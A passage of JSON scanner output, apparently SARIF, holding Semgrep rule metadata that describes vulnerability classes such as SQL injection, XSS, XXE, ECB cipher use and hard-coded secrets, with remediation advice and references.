Module)."},"helpUri":"https://semgrep.dev/r/ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password","id":"ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password","name":"ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an AWS Elasticsearch domain using an insecure version of TLS. To fix this, set \"tls_security_policy\" equal to \"Policy-Min-TLS-1-2-2019-07\"."},"help":{"markdown":"Detected an AWS Elasticsearch domain using an insecure version of TLS. To fix this, set \"tls_security_policy\" equal to \"Policy-Min-TLS-1-2-2019-07\".\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected an AWS Elasticsearch domain using an insecure version of TLS. To fix this, set \"tls_security_policy\" equal to \"Policy-Min-TLS-1-2-2019-07\"."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version","id":"terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version","name":"terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of angular.element can lead to XSS if user-input is treated as part of the HTML element within `$SINK`. It is recommended to contextually output encode user-input, before inserting into `$SINK`. If the HTML needs to be preserved it is recommended to sanitize the input using $sce.getTrustedHTML or $sanitize."},"help":{"markdown":"Use of angular.element can lead to XSS if user-input is treated as part of the HTML element within `$SINK`. It is recommended to contextually output encode user-input, before inserting into `$SINK`. If the HTML needs to be preserved it is recommended to sanitize the input using $sce.getTrustedHTML or $sanitize.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint)\n - [https://docs.angularjs.org/api/ng/function/angular.element](https://docs.angularjs.org/api/ng/function/angular.element)\n - [https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf](https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf)\n","text":"Use of angular.element can lead to XSS if user-input is treated as part of the HTML element within `$SINK`. It is recommended to contextually output encode user-input, before inserting into `$SINK`. If the HTML needs to be preserved it is recommended to sanitize the input using $sce.getTrustedHTML or $sanitize."},"helpUri":"https://semgrep.dev/r/javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint","id":"javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint","name":"javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a pgx Go SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead. You can use parameterized queries like so: (`SELECT $1 FROM table`, `data1)"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a pgx Go SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead. You can use parameterized queries like so: (`SELECT $1 FROM table`, `data1)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.sqli.pgx-sqli.pgx-sqli)\n - [https://github.com/jackc/pgx](https://github.com/jackc/pgx)\n - [https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool](https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool)\n","text":"Detected string concatenation with a non-literal variable in a pgx Go SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead. You can use parameterized queries like so: (`SELECT $1 FROM table`, `data1)"},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.sqli.pgx-sqli.pgx-sqli","id":"go.lang.security.audit.sqli.pgx-sqli.pgx-sqli","name":"go.lang.security.audit.sqli.pgx-sqli.pgx-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.sqli.pgx-sqli.pgx-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.pg.pg-empty-password.pg-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.pg.pg-empty-password.pg-empty-password","id":"go.secrets.pg.pg-empty-password.pg-empty-password","name":"go.secrets.pg.pg-empty-password.pg-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.pg.pg-empty-password.pg-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a 'urllib.request.Request()' object using an insecure transport protocol, 'http://'. This connection will not be encrypted. Use 'https://' instead."},"help":{"markdown":"Detected a 'urllib.request.Request()' object using an insecure transport protocol, 'http://'. This connection will not be encrypted. Use 'https://' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object)\n - [https://docs.python.org/3/library/urllib.request.html#urllib.request.Request](https://docs.python.org/3/library/urllib.request.html#urllib.request.Request)\n","text":"Detected a 'urllib.request.Request()' object using an insecure transport protocol, 'http://'. This connection will not be encrypted. Use 'https://' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object","id":"python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object","name":"python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"`$TY` is setup to use the ECB cipher mode. This mode is insecure because it does not use an initialization vector (IV) and can leak information about the plaintext. Use a more secure scheme like `AesGcm` or a mode like `CipherMode.CTS`."},"help":{"markdown":"`$TY` is setup to use the ECB cipher mode. This mode is insecure because it does not use an initialization vector (IV) and can leak information about the plaintext. Use a more secure scheme like `AesGcm` or a mode like `CipherMode.CTS`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode)\n - [https://cwe.mitre.org/data/definitions/327.html](https://cwe.mitre.org/data/definitions/327.html)\n - [https://learn.microsoft.com/en-us/dotnet/fundamentals/code-analysis/quality-rules/ca5358](https://learn.microsoft.com/en-us/dotnet/fundamentals/code-analysis/quality-rules/ca5358)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"`$TY` is setup to use the ECB cipher mode. This mode is insecure because it does not use an initialization vector (IV) and can leak information about the plaintext. Use a more secure scheme like `AesGcm` or a mode like `CipherMode.CTS`."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode","id":"csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode","name":"csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The function `openssl_decrypt` returns either a string of the decrypted data on success or `false` on failure. If the failure case is not handled, this could lead to undefined behavior in your application. Please handle the case where `openssl_decrypt` returns `false`."},"help":{"markdown":"The function `openssl_decrypt` returns either a string of the decrypted data on success or `false` on failure. If the failure case is not handled, this could lead to undefined behavior in your application. Please handle the case where `openssl_decrypt` returns `false`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate)\n - [https://www.php.net/manual/en/function.openssl-decrypt.php](https://www.php.net/manual/en/function.openssl-decrypt.php)\n","text":"The function `openssl_decrypt` returns either a string of the decrypted data on success or `false` on failure. If the failure case is not handled, this could lead to undefined behavior in your application. Please handle the case where `openssl_decrypt` returns `false`."},"helpUri":"https://semgrep.dev/r/php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate","id":"php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate","name":"php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate","properties":{"precision":"very-high","tags":["CWE-252: Unchecked Return Value","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases."},"helpUri":"https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false","id":"python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false","name":"python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application's App Transport Security (ATS) configuration does not leverage the in-built public key pinning mechanisms. The application should consider leverage ATS public key pinning to ensure that the application only communicates to serves with an allow-listed certificate (and public key). By default the device will allow connections if the default trust store (CA store) posesses the right certificates. The number of accepted Certificate Authorities by default is hundreds. Using public key pinning vastly reduces the attack surface."},"help":{"markdown":"The application's App Transport Security (ATS) configuration does not leverage the in-built public key pinning mechanisms. The application should consider leverage ATS public key pinning to ensure that the application only communicates to serves with an allow-listed certificate (and public key). By default the device will allow connections if the default trust store (CA store) posesses the right certificates. The number of accepted Certificate Authorities by default is hundreds. Using public key pinning vastly reduces the attack surface.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication)\n","text":"The application's App Transport Security (ATS) configuration does not leverage the in-built public key pinning mechanisms. The application should consider leverage ATS public key pinning to ensure that the application only communicates to serves with an allow-listed certificate (and public key). By default the device will allow connections if the default trust store (CA store) posesses the right certificates. The number of accepted Certificate Authorities by default is hundreds. Using public key pinning vastly reduces the attack surface."},"helpUri":"https://semgrep.dev/r/swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning","id":"swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning","name":"swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning","properties":{"precision":"very-high","tags":["CWE-296: Improper Following of a Certificate's Chain of Trust","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader)\n - [https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html](https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html)\n - [https://www.php.net/libxml_disable_entity_loader](https://www.php.net/libxml_disable_entity_loader)\n - [https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php](https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader","id":"php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader","name":"php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Auditing is not enabled for DocumentDB. To ensure that you are able to accurately audit the usage of your DocumentDB cluster, you should enable auditing and export logs to CloudWatch."},"help":{"markdown":"Auditing is not enabled for DocumentDB. To ensure that you are able to accurately audit the usage of your DocumentDB cluster, you should enable auditing and export logs to CloudWatch.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/docdb_cluster#enabled_cloudwatch_logs_exports](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/docdb_cluster#enabled_cloudwatch_logs_exports)\n - [https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/)\n","text":"Auditing is not enabled for DocumentDB. To ensure that you are able to accurately audit the usage of your DocumentDB cluster, you should enable auditing and export logs to CloudWatch."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled","id":"terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled","name":"terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled","properties":{"precision":"very-high","tags":["CWE-778: Insufficient Logging","MEDIUM CONFIDENCE","OWASP-A09:2021 - Security Logging and Monitoring Failures","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Using variable interpolation `${{...}}` with `github` context data in a `actions/github-script`'s `script:` step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. `github` context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with `env:` to store the data and use the environment variable in the `run:` script. Be sure to use double-quotes the environment variable, like this: \"$ENVVAR\"."},"help":{"markdown":"Using variable interpolation `${{...}}` with `github` context data in a `actions/github-script`'s `script:` step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. `github` context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with `env:` to store the data and use the environment variable in the `run:` script. Be sure to use double-quotes the environment variable, like this: \"$ENVVAR\".\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.github-actions.security.github-script-injection.github-script-injection)\n - [https://docs.github.com/en/actions/learn-github-actions/security-hardening-for-github-actions#understanding-the-risk-of-script-injections](https://docs.github.com/en/actions/learn-github-actions/security-hardening-for-github-actions#understanding-the-risk-of-script-injections)\n - [https://securitylab.github.com/research/github-actions-untrusted-input/](https://securitylab.github.com/research/github-actions-untrusted-input/)\n - [https://github.com/actions/github-script](https://github.com/actions/github-script)\n","text":"Using variable interpolation `${{...}}` with `github` context data in a `actions/github-script`'s `script:` step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. `github` context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with `env:` to store the data and use the environment variable in the `run:` script. Be sure to use double-quotes the environment variable, like this: \"$ENVVAR\"."},"helpUri":"https://semgrep.dev/r/yaml.github-actions.security.github-script-injection.github-script-injection","id":"yaml.github-actions.security.github-script-injection.github-script-injection","name":"yaml.github-actions.security.github-script-injection.github-script-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.github-actions.security.github-script-injection.github-script-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret","id":"java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret","name":"java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found a formatted template string passed to 'template.HTML()'. 'template.HTML()' does not escape contents. Be absolutely sure there is no user-controlled data in this template. If user data can reach this template, you may have a XSS vulnerability."},"help":{"markdown":"Found a formatted template string passed to 'template.HTML()'. 'template.HTML()' does not escape contents. Be absolutely sure there is no user-controlled data in this template. If user data can reach this template, you may have a XSS vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.formatted-template-string.formatted-template-string)\n - [https://golang.org/pkg/html/template/#HTML](https://golang.org/pkg/html/template/#HTML)\n","text":"Found a formatted template string passed to 'template.HTML()'. 'template.HTML()' does not escape contents. Be absolutely sure there is no user-controlled data in this template. If user data can reach this template, you may have a XSS vulnerability."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.formatted-template-string.formatted-template-string","id":"go.lang.security.audit.net.formatted-template-string.formatted-template-string","name":"go.lang.security.audit.net.formatted-template-string.formatted-template-string","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.formatted-template-string.formatted-template-string"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array","id":"python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array","name":"python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks through parameter entities by configuring $FACTORY with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks through parameter entities by configuring $FACTORY with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - 